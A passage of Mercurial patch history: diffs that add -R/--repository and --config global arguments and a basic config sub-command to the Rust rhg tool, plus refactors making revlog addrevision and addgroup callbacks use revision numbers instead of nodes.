DebugDataKind}; use hg::repo::Repo; use micro_timer::timed; +use std::path::Path; pub const HELP_TEXT: &str = " Dump the contents of a data file revision @@ -44,6 +45,7 @@ pub fn run( ui: &Ui, config: &Config, + repo_path: 
Option<&Path>, args: &ArgMatches, ) -> Result<(), CommandError> { let rev = args @@ -61,7 +63,7 @@ } }; - let repo = Repo::find(config)?; + let repo = Repo::find(config, repo_path)?; let data = debug_data(&repo, rev, kind).map_err(|e| (e, rev))?; let mut stdout = ui.stdout_buffer(); diff --git a/rust/rhg/src/commands/debugrequirements.rs b/rust/rhg/src/commands/debugrequirements.rs --- a/rust/rhg/src/commands/debugrequirements.rs +++ b/rust/rhg/src/commands/debugrequirements.rs @@ -3,6 +3,7 @@ use clap::ArgMatches; use hg::config::Config; use hg::repo::Repo; +use std::path::Path; pub const HELP_TEXT: &str = " Print the current repo requirements. @@ -15,9 +16,10 @@ pub fn run( ui: &Ui, config: &Config, + repo_path: Option<&Path>, _args: &ArgMatches, ) -> Result<(), CommandError> { - let repo = Repo::find(config)?; + let repo = Repo::find(config, repo_path)?; let mut output = String::new(); let mut requirements: Vec<_> = repo.requirements().iter().collect(); requirements.sort(); diff --git a/rust/rhg/src/commands/files.rs b/rust/rhg/src/commands/files.rs --- a/rust/rhg/src/commands/files.rs +++ b/rust/rhg/src/commands/files.rs @@ -8,6 +8,7 @@ use hg::repo::Repo; use hg::utils::files::{get_bytes_from_path, relativize_path}; use hg::utils::hg_path::{HgPath, HgPathBuf}; +use std::path::Path; pub const HELP_TEXT: &str = " List tracked files. 
@@ -31,11 +32,12 @@ pub fn run( ui: &Ui, config: &Config, + repo_path: Option<&Path>, args: &ArgMatches, ) -> Result<(), CommandError> { let rev = args.value_of("rev"); - let repo = Repo::find(config)?; + let repo = Repo::find(config, repo_path)?; if let Some(rev) = rev { let files = list_rev_tracked_files(&repo, rev).map_err(|e| (e, rev))?; @@ -52,16 +54,15 @@ repo: &Repo, files: impl IntoIterator<Item = &'a HgPath>, ) -> Result<(), CommandError> { - let cwd = hg::utils::current_dir()?; - let rooted_cwd = cwd - .strip_prefix(repo.working_directory_path()) - .expect("cwd was already checked within the repository"); - let rooted_cwd = HgPathBuf::from(get_bytes_from_path(rooted_cwd)); + let cwd = HgPathBuf::from(get_bytes_from_path(hg::utils::current_dir()?)); + let working_directory = + HgPathBuf::from(get_bytes_from_path(repo.working_directory_path())); let mut stdout = ui.stdout_buffer(); for file in files { - stdout.write_all(relativize_path(file, &rooted_cwd).as_ref())?; + let file = working_directory.join(file); + stdout.write_all(relativize_path(&file, &cwd).as_ref())?; stdout.write_all(b"\n")?; } stdout.flush()?; diff --git a/rust/rhg/src/commands/root.rs b/rust/rhg/src/commands/root.rs --- a/rust/rhg/src/commands/root.rs +++ b/rust/rhg/src/commands/root.rs @@ -5,6 +5,7 @@ use hg::config::Config; use hg::repo::Repo; use hg::utils::files::get_bytes_from_path; +use std::path::Path; pub const HELP_TEXT: &str = " Print the root directory of the current repository. 
@@ -19,9 +20,10 @@ pub fn run( ui: &Ui, config: &Config, + repo_path: Option<&Path>, _args: &ArgMatches, ) -> Result<(), CommandError> { - let repo = Repo::find(config)?; + let repo = Repo::find(config, repo_path)?; let bytes = get_bytes_from_path(repo.working_directory_path()); ui.write_stdout(&format_bytes!(b"{}\n", bytes.as_slice()))?; Ok(()) diff --git a/rust/rhg/src/error.rs b/rust/rhg/src/error.rs --- a/rust/rhg/src/error.rs +++ b/rust/rhg/src/error.rs @@ -54,10 +54,10 @@ impl From<RepoError> for CommandError { fn from(error: RepoError) -> Self { match error { - RepoError::NotFound { current_directory } => CommandError::Abort { + RepoError::NotFound { at } => CommandError::Abort { message: format_bytes!( b"no repository found in '{}' (.hg not found)!", - get_bytes_from_path(current_directory) + get_bytes_from_path(at) ), }, RepoError::ConfigParseError(error) => error.into(), diff --git a/rust/rhg/src/main.rs b/rust/rhg/src/main.rs --- a/rust/rhg/src/main.rs +++ b/rust/rhg/src/main.rs @@ -1,14 +1,27 @@ extern crate log; use clap::App; use clap::AppSettings; +use clap::Arg; use clap::ArgMatches; use format_bytes::format_bytes; +use std::path::Path; mod error; mod exitcode; mod ui; use error::CommandError; +fn add_global_args<'a, 'b>(app: App<'a, 'b>) -> App<'a, 'b> { + app.arg( + Arg::with_name("repository") + .help("repository root directory") + .short("-R") + .long("--repository") + .value_name("REPO") + .takes_value(true), + ) +} + fn main() { env_logger::init(); let app = App::new("rhg") @@ -16,6 +29,7 @@ .setting(AppSettings::SubcommandRequired) .setting(AppSettings::VersionlessSubcommands) .version("0.0.1"); + let app = add_global_args(app); let app = add_subcommand_args(app); let ui = ui::Ui::new(); @@ -24,15 +38,22 @@ let _ = ui.writeln_stderr_str(&err.message); std::process::exit(exitcode::UNIMPLEMENTED) }); + let (subcommand_name, subcommand_matches) = matches.subcommand(); let run = subcommand_run_fn(subcommand_name) .expect("unknown subcommand name 
from clap despite AppSettings::SubcommandRequired"); let args = subcommand_matches .expect("no subcommand arguments from clap despite AppSettings::SubcommandRequired"); + // Global arguments can be in either based on e.g. `hg -R ./foo log` v.s. + // `hg log -R ./foo` + let global_arg = + |name| args.value_of_os(name).or_else(|| matches.value_of_os(name)); + + let repo_path = global_arg("repository").map(Path::new); let result = (|| -> Result<(), CommandError> { let config = hg::config::Config::load()?; - run(&ui, &config, args) + run(&ui, &config, repo_path, args) })(); let exit_code = match result { @@ -66,13 +87,14 @@ fn add_subcommand_args<'a, 'b>(app: App<'a, 'b>) -> App<'a, 'b> { app $( - .subcommand(commands::$command::args()) + .subcommand(add_global_args(commands::$command::args())) )+ } fn subcommand_run_fn(name: &str) -> Option<fn( &ui::Ui, &hg::config::Config, + Option<&Path>, &ArgMatches, ) -> Result<(), CommandError>> { match name { diff --git a/tests/test-rhg.t b/tests/test-rhg.t --- a/tests/test-rhg.t +++ b/tests/test-rhg.t @@ -15,7 +15,7 @@ error: Found argument 'unimplemented-command' which wasn't expected, or isn't valid in this context USAGE: - rhg <SUBCOMMAND> + rhg [OPTIONS] <SUBCOMMAND> For more information try --help [252] @@ -204,35 +204,30 @@ $ cd $TESTTMP $ hg init repo1 - $ cd repo1 - $ echo a > a - $ hg commit -A -m'init' + $ echo a > repo1/a + $ hg -R repo1 commit -A -m'init' adding a - $ cd .. $ hg share repo1 repo2 updating working directory 1 files updated, 0 files merged, 0 files removed, 0 files unresolved And check that basic rhg commands work with sharing - $ cd repo2 - $ rhg files - a - $ rhg cat -r 0 a + $ rhg files -R repo2 + repo2/a + $ rhg -R repo2 cat -r 0 repo2/a a Same with relative sharing - $ cd .. 
$ hg share repo2 repo3 --relative updating working directory 1 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ cd repo3 - $ rhg files - a - $ rhg cat -r 0 a + $ rhg files -R repo3 + repo3/a + $ rhg -R repo3 cat -r 0 repo3/a a Same with share-safe # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1612822124 -3600 # Mon Feb 08 23:08:44 2021 +0100 # Node ID 2e5dd18d6dc3ee12a9e4098da5b4c8c732cf171e # Parent d8730ff51d5a97dba40046b9a6cac0a66a7e16b6 rhg: Add support for --config CLI arguments Differential Revision: https://phab.mercurial-scm.org/D9971 diff --git a/rust/hg-core/src/config/config.rs b/rust/hg-core/src/config/config.rs --- a/rust/hg-core/src/config/config.rs +++ b/rust/hg-core/src/config/config.rs @@ -65,9 +65,9 @@ /// Load system and user configuration from various files. /// /// This is also affected by some environment variables. - /// - /// TODO: add a parameter for `--config` CLI arguments - pub fn load() -> Result<Self, ConfigError> { + pub fn load( + cli_config_args: impl IntoIterator<Item = impl AsRef<[u8]>>, + ) -> Result<Self, ConfigError> { let mut config = Self { layers: Vec::new() }; let opt_rc_path = env::var_os("HGRCPATH"); // HGRCPATH replaces system config @@ -92,6 +92,9 @@ } } } + if let Some(layer) = ConfigLayer::parse_cli_args(cli_config_args)? 
{ + config.layers.push(layer) + } Ok(config) } diff --git a/rust/hg-core/src/config/layer.rs b/rust/hg-core/src/config/layer.rs --- a/rust/hg-core/src/config/layer.rs +++ b/rust/hg-core/src/config/layer.rs @@ -51,6 +51,49 @@ } } + /// Parse `--config` CLI arguments and return a layer if there’s any + pub(crate) fn parse_cli_args( + cli_config_args: impl IntoIterator<Item = impl AsRef<[u8]>>, + ) -> Result<Option<Self>, ConfigError> { + fn parse_one(arg: &[u8]) -> Option<(Vec<u8>, Vec<u8>, Vec<u8>)> { + use crate::utils::SliceExt; + + let (section_and_item, value) = split_2(arg, b'=')?; + let (section, item) = split_2(section_and_item.trim(), b'.')?; + Some(( + section.to_owned(), + item.to_owned(), + value.trim().to_owned(), + )) + } + + fn split_2(bytes: &[u8], separator: u8) -> Option<(&[u8], &[u8])> { + let mut iter = bytes.splitn(2, |&byte| byte == separator); + let a = iter.next()?; + let b = iter.next()?; + Some((a, b)) + } + + let mut layer = Self::new(ConfigOrigin::CommandLine); + for arg in cli_config_args { + let arg = arg.as_ref(); + if let Some((section, item, value)) = parse_one(arg) { + layer.add(section, item, value, None); + } else { + Err(HgError::abort(format!( + "malformed --config option: \"{}\" \ + (use --config section.name=value)", + String::from_utf8_lossy(arg), + )))? 
+ } + } + if layer.sections.is_empty() { + Ok(None) + } else { + Ok(Some(layer)) + } + } + /// Returns whether this layer comes from `--config` CLI arguments pub(crate) fn is_from_command_line(&self) -> bool { if let ConfigOrigin::CommandLine = self.origin { diff --git a/rust/rhg/src/main.rs b/rust/rhg/src/main.rs --- a/rust/rhg/src/main.rs +++ b/rust/rhg/src/main.rs @@ -20,6 +20,17 @@ .value_name("REPO") .takes_value(true), ) + .arg( + Arg::with_name("config") + .help("set/override config option (use 'section.name=value')") + .long("--config") + .value_name("CONFIG") + .takes_value(true) + // Ok: `--config section.key1=val --config section.key2=val2` + .multiple(true) + // Not ok: `--config section.key1=val section.key2=val2` + .number_of_values(1), + ) } fn main() { @@ -47,12 +58,22 @@ // Global arguments can be in either based on e.g. `hg -R ./foo log` v.s. // `hg log -R ./foo` - let global_arg = + let value_of_global_arg = |name| args.value_of_os(name).or_else(|| matches.value_of_os(name)); + // For arguments where multiple occurences are allowed, return a + // possibly-iterator of all values. 
+ let values_of_global_arg = |name: &str| { + let a = matches.values_of_os(name).into_iter().flatten(); + let b = args.values_of_os(name).into_iter().flatten(); + a.chain(b) + }; - let repo_path = global_arg("repository").map(Path::new); + let repo_path = value_of_global_arg("repository").map(Path::new); let result = (|| -> Result<(), CommandError> { - let config = hg::config::Config::load()?; + let config_args = values_of_global_arg("config") + // `get_bytes_from_path` works for OsStr the same as for Path + .map(hg::utils::files::get_bytes_from_path); + let config = hg::config::Config::load(config_args)?; run(&ui, &config, repo_path, args) })(); # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1612824118 -3600 # Mon Feb 08 23:41:58 2021 +0100 # Node ID a25033eb43b50ccd4947c376894cfb5a9529a861 # Parent 2e5dd18d6dc3ee12a9e4098da5b4c8c732cf171e rhg: add limited support for the `config` sub-command Only with one argument and no flag. This is mostly for testing. Differential Revision: https://phab.mercurial-scm.org/D9972 diff --git a/rust/hg-core/src/config/layer.rs b/rust/hg-core/src/config/layer.rs --- a/rust/hg-core/src/config/layer.rs +++ b/rust/hg-core/src/config/layer.rs @@ -58,8 +58,8 @@ fn parse_one(arg: &[u8]) -> Option<(Vec<u8>, Vec<u8>, Vec<u8>)> { use crate::utils::SliceExt; - let (section_and_item, value) = split_2(arg, b'=')?; - let (section, item) = split_2(section_and_item.trim(), b'.')?; + let (section_and_item, value) = arg.split_2(b'=')?; + let (section, item) = section_and_item.trim().split_2(b'.')?; Some(( section.to_owned(), item.to_owned(), @@ -67,13 +67,6 @@ )) } - fn split_2(bytes: &[u8], separator: u8) -> Option<(&[u8], &[u8])> { - let mut iter = bytes.splitn(2, |&byte| byte == separator); - let a = iter.next()?; - let b = iter.next()?; - Some((a, b)) - } - let mut layer = Self::new(ConfigOrigin::CommandLine); for arg in cli_config_args { let arg = arg.as_ref(); diff --git a/rust/hg-core/src/repo.rs 
b/rust/hg-core/src/repo.rs --- a/rust/hg-core/src/repo.rs +++ b/rust/hg-core/src/repo.rs @@ -43,10 +43,14 @@ } impl Repo { - /// Search the current directory and its ancestores for a repository: - /// a working directory that contains a `.hg` sub-directory. + /// Find a repository, either at the given path (which must contain a `.hg` + /// sub-directory) or by searching the current directory and its + /// ancestors. /// - /// `explicit_path` is for `--repository` command-line arguments. + /// A method with two very different "modes" like this usually a code smell + /// to make two methods instead, but in this case an `Option` is what rhg + /// sub-commands get from Clap for the `-R` / `--repository` CLI argument. + /// Having two methods would just move that `if` to almost all callers. pub fn find( config: &Config, explicit_path: Option<&Path>, @@ -77,6 +81,28 @@ } } + /// Like `Repo::find`, but not finding a repository is not an error if no + /// explicit path is given. `Ok(None)` is returned in that case. + /// + /// If an explicit path *is* given, not finding a repository there is still + /// an error. + /// + /// For sub-commands that don’t need a repository, configuration should + /// still be affected by a repository’s `.hg/hgrc` file. This is the + /// constructor to use. + pub fn find_optional( + config: &Config, + explicit_path: Option<&Path>, + ) -> Result<Option<Self>, RepoError> { + match Self::find(config, explicit_path) { + Ok(repo) => Ok(Some(repo)), + Err(RepoError::NotFound { .. 
}) if explicit_path.is_none() => { + Ok(None) + } + Err(error) => Err(error), + } + } + /// To be called after checking that `.hg` is a sub-directory fn new_at_path( working_directory: PathBuf, diff --git a/rust/hg-core/src/utils.rs b/rust/hg-core/src/utils.rs --- a/rust/hg-core/src/utils.rs +++ b/rust/hg-core/src/utils.rs @@ -67,6 +67,7 @@ fn trim_start(&self) -> &Self; fn trim(&self) -> &Self; fn drop_prefix(&self, needle: &Self) -> Option<&Self>; + fn split_2(&self, separator: u8) -> Option<(&[u8], &[u8])>; } #[allow(clippy::trivially_copy_pass_by_ref)] @@ -116,6 +117,13 @@ None } } + + fn split_2(&self, separator: u8) -> Option<(&[u8], &[u8])> { + let mut iter = self.splitn(2, |&byte| byte == separator); + let a = iter.next()?; + let b = iter.next()?; + Some((a, b)) + } } pub trait Escaped { diff --git a/rust/rhg/src/commands/root.rs b/rust/rhg/src/commands/config.rs copy from rust/rhg/src/commands/root.rs copy to rust/rhg/src/commands/config.rs --- a/rust/rhg/src/commands/root.rs +++ b/rust/rhg/src/commands/config.rs @@ -1,30 +1,52 @@ use crate::error::CommandError; use crate::ui::Ui; +use clap::Arg; use clap::ArgMatches; use format_bytes::format_bytes; use hg::config::Config; +use hg::errors::HgError; use hg::repo::Repo; -use hg::utils::files::get_bytes_from_path; +use hg::utils::SliceExt; use std::path::Path; pub const HELP_TEXT: &str = " -Print the root directory of the current repository. - -Returns 0 on success. +With one argument of the form section.name, print just the value of that config item. 
"; pub fn args() -> clap::App<'static, 'static> { - clap::SubCommand::with_name("root").about(HELP_TEXT) + clap::SubCommand::with_name("config") + .arg( + Arg::with_name("name") + .help("the section.name to print") + .value_name("NAME") + .required(true) + .takes_value(true), + ) + .about(HELP_TEXT) } pub fn run( ui: &Ui, config: &Config, repo_path: Option<&Path>, - _args: &ArgMatches, + args: &ArgMatches, ) -> Result<(), CommandError> { - let repo = Repo::find(config, repo_path)?; - let bytes = get_bytes_from_path(repo.working_directory_path()); - ui.write_stdout(&format_bytes!(b"{}\n", bytes.as_slice()))?; + let opt_repo = Repo::find_optional(config, repo_path)?; + let config = if let Some(repo) = &opt_repo { + repo.config() + } else { + config + }; + + let (section, name) = args + .value_of("name") + .expect("missing required CLI argument") + .as_bytes() + .split_2(b'.') + .ok_or_else(|| HgError::abort(""))?; + + let value = config.get(section, name).unwrap_or(b""); + + ui.write_stdout(&format_bytes!(b"{}\n", value))?; Ok(()) } diff --git a/rust/rhg/src/main.rs b/rust/rhg/src/main.rs --- a/rust/rhg/src/main.rs +++ b/rust/rhg/src/main.rs @@ -134,4 +134,5 @@ debugrequirements files root + config } diff --git a/tests/test-rhg.t b/tests/test-rhg.t --- a/tests/test-rhg.t +++ b/tests/test-rhg.t @@ -30,6 +30,18 @@ $ rhg root $TESTTMP/repository +Reading and setting configuration + $ echo "[ui]" >> $HGRCPATH + $ echo "username = user1" >> $HGRCPATH + $ rhg config ui.username + user1 + $ echo "[ui]" >> .hg/hgrc + $ echo "username = user2" >> .hg/hgrc + $ rhg config ui.username + user2 + $ rhg --config ui.username=user3 config ui.username + user3 + Unwritable file descriptor $ rhg root > /dev/full abort: No space left on device (os error 28) # HG changeset patch # User Joerg Sonnenberger <joerg@bec.de> # Date 1611701771 -3600 # Tue Jan 26 23:56:11 2021 +0100 # Node ID 07984507d553de7cc508d8abc90935ebc78b83c7 # Parent a25033eb43b50ccd4947c376894cfb5a9529a861 revlog: change 
_addrevision to return the new revision The node is passed as argument already, so returning it is quite pointless. The revision number on the other is useful as it decouples the caller from the revlog internals. Differential Revision: https://phab.mercurial-scm.org/D9880 diff --git a/mercurial/revlog.py b/mercurial/revlog.py --- a/mercurial/revlog.py +++ b/mercurial/revlog.py @@ -2145,7 +2145,7 @@ dfh = self._datafp(b"a+") ifh = self._indexfp(b"a+") try: - return self._addrevision( + self._addrevision( node, rawtext, transaction, @@ -2158,6 +2158,7 @@ dfh, deltacomputer=deltacomputer, ) + return node finally: if dfh: dfh.close() @@ -2329,7 +2330,7 @@ if type(rawtext) == bytes: # only accept immutable objects self._revisioncache = (node, curr, rawtext) self._chainbasecache[curr] = deltainfo.chainbase - return node + return curr def _writeentry(self, transaction, ifh, dfh, entry, data, link, offset): # Files opened in a+ mode have inconsistent behavior on various # HG changeset patch # User Joerg Sonnenberger <joerg@bec.de> # Date 1611705320 -3600 # Wed Jan 27 00:55:20 2021 +0100 # Node ID 9ee4e988e2beb7f877e024b2804805529ed619f3 # Parent 07984507d553de7cc508d8abc90935ebc78b83c7 revlog: change addrawrevision to return the revision Differential Revision: https://phab.mercurial-scm.org/D9881 diff --git a/mercurial/revlog.py b/mercurial/revlog.py --- a/mercurial/revlog.py +++ b/mercurial/revlog.py @@ -2112,7 +2112,7 @@ if validatehash: self.checkhash(rawtext, node, p1=p1, p2=p2) - return self.addrawrevision( + rev = self.addrawrevision( rawtext, transaction, link, @@ -2123,6 +2123,7 @@ cachedelta=cachedelta, deltacomputer=deltacomputer, ) + return node def addrawrevision( self, @@ -2145,7 +2146,7 @@ dfh = self._datafp(b"a+") ifh = self._indexfp(b"a+") try: - self._addrevision( + return self._addrevision( node, rawtext, transaction, @@ -2158,7 +2159,6 @@ dfh, deltacomputer=deltacomputer, ) - return node finally: if dfh: dfh.close() # HG changeset patch # User Joerg 
Sonnenberger <joerg@bec.de> # Date 1611708197 -3600 # Wed Jan 27 01:43:17 2021 +0100 # Node ID f7b61ad3c64ae0c7eb81da6cb1559d6006b51c0f # Parent 9ee4e988e2beb7f877e024b2804805529ed619f3 revlog: change addrevision to return the new revision, not node Differential Revision: https://phab.mercurial-scm.org/D9882 diff --git a/hgext/sqlitestore.py b/hgext/sqlitestore.py --- a/hgext/sqlitestore.py +++ b/hgext/sqlitestore.py @@ -636,7 +636,8 @@ if meta or filedata.startswith(b'\x01\n'): filedata = storageutil.packmeta(meta, filedata) - return self.addrevision(filedata, transaction, linkrev, p1, p2) + rev = self.addrevision(filedata, transaction, linkrev, p1, p2) + return self.node(rev) def addrevision( self, @@ -658,15 +659,16 @@ if validatehash: self._checkhash(revisiondata, node, p1, p2) - if node in self._nodetorev: - return node + rev = self._nodetorev.get(node) + if rev is not None: + return rev - node = self._addrawrevision( + rev = self._addrawrevision( node, revisiondata, transaction, linkrev, p1, p2 ) self._revisioncache[node] = revisiondata - return node + return rev def addgroup( self, @@ -1079,7 +1081,7 @@ self._revtonode[rev] = node self._revisions[node] = entry - return node + return rev class sqliterepository(localrepo.localrepository): diff --git a/mercurial/changelog.py b/mercurial/changelog.py --- a/mercurial/changelog.py +++ b/mercurial/changelog.py @@ -598,9 +598,10 @@ parseddate = b"%s %s" % (parseddate, extra) l = [hex(manifest), user, parseddate] + sortedfiles + [b"", desc] text = b"\n".join(l) - return self.addrevision( + rev = self.addrevision( text, transaction, len(self), p1, p2, sidedata=sidedata, flags=flags ) + return self.node(rev) def branchinfo(self, rev): """return the branch name and open/close state of a revision diff --git a/mercurial/filelog.py b/mercurial/filelog.py --- a/mercurial/filelog.py +++ b/mercurial/filelog.py @@ -176,7 +176,8 @@ def add(self, text, meta, transaction, link, p1=None, p2=None): if meta or 
text.startswith(b'\1\n'): text = storageutil.packmeta(meta, text) - return self.addrevision(text, transaction, link, p1, p2) + rev = self.addrevision(text, transaction, link, p1, p2) + return self.node(rev) def renamed(self, node): return storageutil.filerevisioncopied(self, node) diff --git a/mercurial/interfaces/repository.py b/mercurial/interfaces/repository.py --- a/mercurial/interfaces/repository.py +++ b/mercurial/interfaces/repository.py @@ -734,7 +734,7 @@ flags=0, cachedelta=None, ): - """Add a new revision to the store. + """Add a new revision to the store and return its number. This is similar to ``add()`` except it operates at a lower level. diff --git a/mercurial/manifest.py b/mercurial/manifest.py --- a/mercurial/manifest.py +++ b/mercurial/manifest.py @@ -1704,9 +1704,10 @@ arraytext, deltatext = m.fastdelta(self.fulltextcache[p1], work) cachedelta = self._revlog.rev(p1), deltatext text = util.buffer(arraytext) - n = self._revlog.addrevision( + rev = self._revlog.addrevision( text, transaction, link, p1, p2, cachedelta ) + n = self._revlog.node(rev) except FastdeltaUnavailable: # The first parent manifest isn't already loaded or the # manifest implementation doesn't support fastdelta, so @@ -1724,7 +1725,8 @@ arraytext = None else: text = m.text() - n = self._revlog.addrevision(text, transaction, link, p1, p2) + rev = self._revlog.addrevision(text, transaction, link, p1, p2) + n = self._revlog.node(rev) arraytext = bytearray(text) if arraytext is not None: @@ -1765,9 +1767,10 @@ n = m2.node() if not n: - n = self._revlog.addrevision( + rev = self._revlog.addrevision( text, transaction, link, m1.node(), m2.node() ) + n = self._revlog.node(rev) # Save nodeid so parent manifest can calculate its nodeid m.setnode(n) diff --git a/mercurial/revlog.py b/mercurial/revlog.py --- a/mercurial/revlog.py +++ b/mercurial/revlog.py @@ -2106,13 +2106,14 @@ ) node = node or self.hash(rawtext, p1, p2) - if self.index.has_node(node): - return node + rev = 
self.index.get_rev(node) + if rev is not None: + return rev if validatehash: self.checkhash(rawtext, node, p1=p1, p2=p2) - rev = self.addrawrevision( + return self.addrawrevision( rawtext, transaction, link, @@ -2123,7 +2124,6 @@ cachedelta=cachedelta, deltacomputer=deltacomputer, ) - return node def addrawrevision( self, # HG changeset patch # User Joerg Sonnenberger <joerg@bec.de> # Date 1611711291 -3600 # Wed Jan 27 02:34:51 2021 +0100 # Node ID 7a93b7b3dc2d3b23af5a44321ac3c72ccaf6e6a1 # Parent f7b61ad3c64ae0c7eb81da6cb1559d6006b51c0f revlog: change addgroup callbacks to take revision numbers Differential Revision: https://phab.mercurial-scm.org/D9883 diff --git a/hgext/sqlitestore.py b/hgext/sqlitestore.py --- a/hgext/sqlitestore.py +++ b/hgext/sqlitestore.py @@ -743,7 +743,7 @@ ) if duplicaterevisioncb: - duplicaterevisioncb(self, node) + duplicaterevisioncb(self, self.rev(node)) empty = False continue @@ -754,7 +754,7 @@ text = None storedelta = (deltabase, delta) - self._addrawrevision( + rev = self._addrawrevision( node, text, transaction, @@ -766,7 +766,7 @@ ) if addrevisioncb: - addrevisioncb(self, node) + addrevisioncb(self, rev) empty = False return not empty diff --git a/mercurial/changegroup.py b/mercurial/changegroup.py --- a/mercurial/changegroup.py +++ b/mercurial/changegroup.py @@ -318,12 +318,11 @@ efilesset = set() cgnodes = [] - def ondupchangelog(cl, node): - if cl.rev(node) < clstart: - cgnodes.append(node) + def ondupchangelog(cl, rev): + if rev < clstart: + cgnodes.append(cl.node(rev)) - def onchangelog(cl, node): - rev = cl.rev(node) + def onchangelog(cl, rev): ctx = cl.changelogrevision(rev) efilesset.update(ctx.files) repo.register_changeset(rev, ctx) diff --git a/mercurial/changelog.py b/mercurial/changelog.py --- a/mercurial/changelog.py +++ b/mercurial/changelog.py @@ -610,9 +610,9 @@ just to access this is costly.""" return self.changelogrevision(rev).branchinfo - def _nodeduplicatecallback(self, transaction, node): + def 
_nodeduplicatecallback(self, transaction, rev): # keep track of revisions that got "re-added", eg: unbunde of know rev. # # We track them in a list to preserve their order from the source bundle duplicates = transaction.changes.setdefault(b'revduplicates', []) - duplicates.append(self.rev(node)) + duplicates.append(rev) diff --git a/mercurial/exchangev2.py b/mercurial/exchangev2.py --- a/mercurial/exchangev2.py +++ b/mercurial/exchangev2.py @@ -358,15 +358,14 @@ # Linkrev for changelog is always self. return len(cl) - def ondupchangeset(cl, node): - added.append(node) + def ondupchangeset(cl, rev): + added.append(cl.node(rev)) - def onchangeset(cl, node): + def onchangeset(cl, rev): progress.increment() - rev = cl.rev(node) revision = cl.changelogrevision(rev) - added.append(node) + added.append(cl.node(rev)) # We need to preserve the mapping of changelog revision to node # so we can set the linkrev accordingly when manifests are added. @@ -537,8 +536,8 @@ # Chomp off header object. next(objs) - def onchangeset(cl, node): - added.append(node) + def onchangeset(cl, rev): + added.append(cl.node(rev)) rootmanifest.addgroup( iterrevisions(objs, progress), diff --git a/mercurial/interfaces/repository.py b/mercurial/interfaces/repository.py --- a/mercurial/interfaces/repository.py +++ b/mercurial/interfaces/repository.py @@ -774,8 +774,9 @@ This used to be the default when ``addrevisioncb`` was provided up to Mercurial 5.8. - ``addrevisioncb`` should be called for each node as it is committed. - ``duplicaterevisioncb`` should be called for each pre-existing node. + ``addrevisioncb`` should be called for each new rev as it is committed. + ``duplicaterevisioncb`` should be called for all revs with a + pre-existing node. ``maybemissingparents`` is a bool indicating whether the incoming data may reference parents/ancestor revisions that aren't present. 
diff --git a/mercurial/revlog.py b/mercurial/revlog.py --- a/mercurial/revlog.py +++ b/mercurial/revlog.py @@ -2419,11 +2419,12 @@ link = linkmapper(linknode) flags = flags or REVIDX_DEFAULT_FLAGS - if self.index.has_node(node): + rev = self.index.get_rev(node) + if rev is not None: # this can happen if two branches make the same change - self._nodeduplicatecallback(transaction, node) + self._nodeduplicatecallback(transaction, rev) if duplicaterevisioncb: - duplicaterevisioncb(self, node) + duplicaterevisioncb(self, rev) empty = False continue @@ -2461,7 +2462,7 @@ # We're only using addgroup() in the context of changegroup # generation so the revision data can always be handled as raw # by the flagprocessor. - self._addrevision( + rev = self._addrevision( node, None, transaction, @@ -2477,7 +2478,7 @@ ) if addrevisioncb: - addrevisioncb(self, node) + addrevisioncb(self, rev) empty = False if not dfh and not self._inline: diff --git a/mercurial/testing/storage.py b/mercurial/testing/storage.py --- a/mercurial/testing/storage.py +++ b/mercurial/testing/storage.py @@ -1129,12 +1129,13 @@ with self._maketransactionfn() as tr: nodes = [] - def onchangeset(cl, node): + def onchangeset(cl, rev): + node = cl.node(rev) nodes.append(node) cb(cl, node) - def ondupchangeset(cl, node): - nodes.append(node) + def ondupchangeset(cl, rev): + nodes.append(cl.node(rev)) f.addgroup( [], @@ -1163,12 +1164,13 @@ with self._maketransactionfn() as tr: nodes = [] - def onchangeset(cl, node): + def onchangeset(cl, rev): + node = cl.node(rev) nodes.append(node) cb(cl, node) - def ondupchangeset(cl, node): - nodes.append(node) + def ondupchangeset(cl, rev): + nodes.append(cl.node(rev)) f.addgroup( deltas, @@ -1217,8 +1219,8 @@ with self._maketransactionfn() as tr: newnodes = [] - def onchangeset(cl, node): - newnodes.append(node) + def onchangeset(cl, rev): + newnodes.append(cl.node(rev)) f.addgroup( deltas, diff --git a/tests/simplestorerepo.py b/tests/simplestorerepo.py --- 
a/tests/simplestorerepo.py +++ b/tests/simplestorerepo.py @@ -550,7 +550,7 @@ if node in self._indexbynode: if duplicaterevisioncb: - duplicaterevisioncb(self, node) + duplicaterevisioncb(self, self.rev(node)) empty = False continue @@ -560,12 +560,12 @@ else: text = mdiff.patch(self.revision(deltabase), delta) - self._addrawrevision( + rev = self._addrawrevision( node, text, transaction, linkrev, p1, p2, flags ) if addrevisioncb: - addrevisioncb(self, node) + addrevisioncb(self, rev) empty = False return not empty # HG changeset patch # User Joerg Sonnenberger <joerg@bec.de> # Date 1611713234 -3600 # Wed Jan 27 03:07:14 2021 +0100 # Node ID fa7ae7aa0efd2895768a0ad57339a2030fb0fac6 # Parent 7a93b7b3dc2d3b23af5a44321ac3c72ccaf6e6a1 changegroup: don't convert revisions to node for duplicate handling The only consumer can handle revision lists fine. Avoid materializing a range if there are no duplicates as optimization. Differential Revision: https://phab.mercurial-scm.org/D9884 diff --git a/mercurial/changegroup.py b/mercurial/changegroup.py --- a/mercurial/changegroup.py +++ b/mercurial/changegroup.py @@ -316,11 +316,11 @@ self.callback = progress.increment efilesset = set() - cgnodes = [] + duprevs = [] def ondupchangelog(cl, rev): if rev < clstart: - cgnodes.append(cl.node(rev)) + duprevs.append(rev) def onchangelog(cl, rev): ctx = cl.changelogrevision(rev) @@ -448,8 +448,12 @@ if added: phases.registernew(repo, tr, targetphase, added) if phaseall is not None: - phases.advanceboundary(repo, tr, phaseall, cgnodes, revs=added) - cgnodes = [] + if duprevs: + duprevs.extend(added) + else: + duprevs = added + phases.advanceboundary(repo, tr, phaseall, [], revs=duprevs) + duprevs = [] if changesets > 0: # HG changeset patch # User Kyle Lippincott <spectral@google.com> # Date 1612467128 28800 # Thu Feb 04 11:32:08 2021 -0800 # Node ID 02d91167cfc3f3cf57589d6b4356f3869d10f1e9 # Parent fa7ae7aa0efd2895768a0ad57339a2030fb0fac6 tests: add a comment in a test that will 
